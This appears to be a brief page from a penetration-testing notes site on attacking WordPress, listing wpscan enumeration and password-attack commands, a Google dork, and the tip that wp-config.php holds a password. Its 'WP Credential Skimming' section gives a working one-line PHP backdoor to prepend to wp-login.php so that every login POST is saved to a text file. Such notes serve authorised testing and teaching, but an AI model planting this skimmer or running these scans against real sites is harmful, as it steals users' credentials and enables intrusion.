WordPress

WPscan:

wpscan -u 10.10.10.10/wp/
wpscan --url http://10.10.10.10 --detection-mode aggressive -t 20 -e u,ap,tt,vt

Interesting features:

Enumerate directories, users
Password attacks
Scan for vulns in core, plugins, themes

WordPress files:

wp-config.php: Has password

WP Credential Skimming:

This attack needs backdoor access. In htdocs, edit the wp-login.php file with a new line added to the start of the file: <?php file_put_contents('log.txt', file_get_contents('php://input'));?>

This will capture all incoming POSTs and save them into a txt file in the htdocs folder. We would then see captured input in the file when people login or do other interesting POST activity.

Google Dork for vuln versions. Example: "error_log" inurl:/wp-content

Look for vulnerable plugins:

PreviousCMS NextJoomla

Last updated 3 years ago

Was this helpful?